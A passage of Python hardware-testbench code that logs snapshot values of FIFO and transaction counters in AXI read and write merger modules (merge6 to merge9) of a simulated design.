logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge6.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge6.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge6.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge6.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge6.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge6.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge6.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge6.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge6.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge6.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge6.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge6.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge7.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge7.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge7.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge7.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge7.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge7.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge7.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge7.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge7.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge7.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge7.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge7.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge8.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge8.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge8.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge8.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge8.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge8.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge8.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge8.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge8.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge8.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge8.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge8.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge9.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge9.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge9.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge9.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge9.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge9.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge9.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge9.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge9.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge9.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge9.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge9.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge9.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge9.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge9.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge9.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge9.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge9.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge9.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge9.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge9.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge9.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge9.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge9.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge9.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge9.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge9.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge9.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge9.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge9.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge9.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge9.axi_rd_4_merger.c_ids_fifo.count"))
